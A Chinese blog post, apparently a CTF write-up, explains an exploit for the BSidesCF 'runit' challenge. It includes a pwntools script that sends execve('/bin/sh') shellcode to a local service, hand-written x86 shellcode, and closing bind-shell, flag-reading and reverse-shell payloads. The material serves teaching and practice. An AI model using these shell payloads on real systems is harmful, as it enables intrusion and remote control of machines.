pwn-shellcode执行

最新推荐文章于 2024-08-26 19:45:00 发布

GalaxySpaceX

最新推荐文章于 2024-08-26 19:45:00 发布

阅读量897

点赞数 9

分类专栏：逆向漏洞分析文章标签： linux 前端运维

本文链接：https://blog.csdn.net/GalaxySpaceX/article/details/141468790

版权

逆向漏洞分析专栏收录该内容

2 篇文章 0 订阅

订阅专栏

前言：

这应该是pwn中最简单的，就是利用pwntools生成shellcode，远程执行获取shell，这里以BSidesCF_Runit为例：

分析：

拿到runit后首先看下其安全属性和对应的版本，使用checksec

可以看到，什么安全防护都没有设置，那直接反编译看一眼

这太简单了，就是使用mmap申请一块内存后，将获取到的内容进行写入我们申请的内存中，判断内容不为空直接就执行了，那我们只需要发送一段shellcode即可

from pwn import *

context.arch = 'i386'

p = remote('127.0.0.1', 10001)

payload = asm(shellcraft.sh(), os = 'linux')

p.sendlineafter(b'stuff!!\n', payload)

#sleep(2)
#p.send(payload) 

p.interactive()

代码也很简单，就是利用 asm(shellcraft.sh(), os = 'linux')生成一段linux下获取shell的shellcode

其中可以选择使用sendlineafter方法，当发现stuff字符串发送payload内容，或者sleep几秒钟直接发送数据，最后利用interactive进行交互操作

在pwntools文件中可以看到其代码，位置如下：

pwnlib\shellcraft\templates\arm\linux

可以看到其除了sh以外还有其他的shellcode命令

shellcode分析：

深究一下，看看其具体的shellcode代码

使用readelf可以看到是小断存储32位

由此可以知道 2F 62 69 6E 2F 2F 2F 73 68是/bin///sh 此处就是为了压入字符串，即push b'/bin///sh\x00

mov ebx, esp: 将栈顶指针存储在 ebx 寄存器中,作为 execve() 的第一个参数 path。

然后利用如下将 'sh\x00' 字符串压入栈中。

push 0x1010101、xor dword ptr [esp], 0x1016972:

xor ecx, ecx、push ecx: 压入 null 终止符。
push 4、pop ecx、add ecx, esp: 计算参数数组的地址,存储在 ecx 寄存器中,作为 execve() 的第二个参数 argv。

最后就是第三个参数

xor edx, edx: 将 edx 寄存器清零,作为 execve() 的第三个参数 envp。

最后执行 execve() 系统调用:
push SYS_execve、pop eax: 将系统调用号 SYS_execve (值为 0xb) 存入 eax 寄存器。
int 0x80: 触发 int 0x80 系统调用中断,执行 execve() 系统调用。

本质上我们就是希望执行execve(path='/bin///sh', argv=['sh'], envp=0)

其中 ebx，ecx和edx分别为其三个参数

为什么这样做，是因为Linux 32位系统上使用 IA-32 ABI 调用约定。其参数传递: 前 3 个参数分别存放在 ebx、ecx、edx 寄存器中。第 4 个及之后的参数需要压入栈中。返回值: 存放在 eax 寄存器中。

所以linux制作shellcode方法归纳下为：

1.我们首先需要确定要调用的方法即为具体的调用链

2.将所需要参数从左到右依次存放如ebx,ecx ,edx中

3.然后将需要调用的方法地址存入eax中

4.采用int 0x80触发系统断点自动调用eax的内容进而进入指定函数中

5.函数返回的结果存储在eax中，如果存在多个调用需要注意

作为练习，我们可以换个简单点的执行，例如

execve(path='/bin///sh', 0, 0)

对应编写汇编代码：

xor eax, eax
push eax        ; string terminator
push 0x68732f6e ; "hs/n"
push 0x69622f2f ; "ib//"
mov ebx, esp    ; "//bin/sh",0 pointer is ESP
xor ecx, ecx    ; ECX = 0
xor edx, edx    ; EDX = 0
mov al, 0xb     ; execve()
int 0x80

ebx为路径，ecx和edx分别为0，通过系统中断调用eax的值，进入执行 execve方法

测试如下

同样可以成功执行

实测：

首先我们使用如下命令将输出输入转发到指定端口

socat tcp-listen:10001,reuseaddr,fork EXEC:./runit,pty,raw,echo=0

这样就转发到了本地的10001端口，然后就可以执行我们编号的python程序，可以成功的拿下shell

抓包看下流量

绕过：

如果execve被禁止了怎么半，我们除了利用上述进行手工编写shellcode，也可以使用如下payload

shellcode = asm(pwnlib.shellcraft.amd64.linux.bindsh(9999, 'ipv4')) # 绑定shell到999端口
shellcode = asm(pwnlib.shellcraft.amd64.linux.cat("/flag", 1)) # 读取/flag，输出到标准输出
shellcode = asm(pwnlib.shellcraft.amd64.linux.cat2("/flag", 1, 0x30)) # 读取/flag，输出到标准输出
shellcode = asm(pwnlib.shellcraft.amd64.linux.socket("ipv4", "tcp")+\
               pwnlib.shellcraft.amd64.linux.connect("127.0.0.1", 9999, 'ipv4')+\
               pwnlib.shellcraft.amd64.linux.dupsh('rax')
               )